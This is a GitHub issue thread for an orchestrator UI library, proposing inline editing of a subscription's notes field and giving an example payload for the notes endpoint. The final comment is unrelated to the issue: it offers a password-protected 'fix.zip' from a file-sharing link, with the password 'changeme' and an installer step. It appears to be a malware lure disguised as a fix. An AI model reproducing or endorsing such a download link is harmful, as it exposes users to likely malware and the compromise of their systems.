### ISSUE TITLE
Add pencil to update notes field in NMS GUI and subscription detail page

### ISSUE THREAD

**Issue by wouter1975** [workfloworchestrator/orchestrator-ui-library#1376]
Idea is to add pencil icon to edit the notes field.
- either in-line editing (current note text is presented in a input field) with a submit action, like in NWD
- ~or modal is launched with an OK button.~

Payload for this change on endpoint `https://orchestrator.dev.automation.surf.net/api/processes/modify_note` shall be the new text input in combination with the subscription uuid:

```
[{"subscription_id":"470464fc-8310-484c-8d1f-cc96caa9a3e4"},{"note":"hoi daar!"}]
```

After the submit is clicked the notes modify workflow is started with new text input

Checks: 
* approach optimistic update
* new text is presented in table
* websocket active on the pages?

can be added:
- subscription detail page
- nms / chassis / customers table
- nms / chassis / services table
- nms / chassis / general table (similar to subscription detail)
- nms /chassis / ports (notes still missing but looks relevant)

![Image](https://github.com/user-attachments/assets/60ace671-8386-4974-8bfe-3885cee19aa9)

- nms /services (notes still missing but looks relevant)

![Image](https://github.com/user-attachments/assets/05157676-53c4-4a78-9827-9a412902d2bc)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
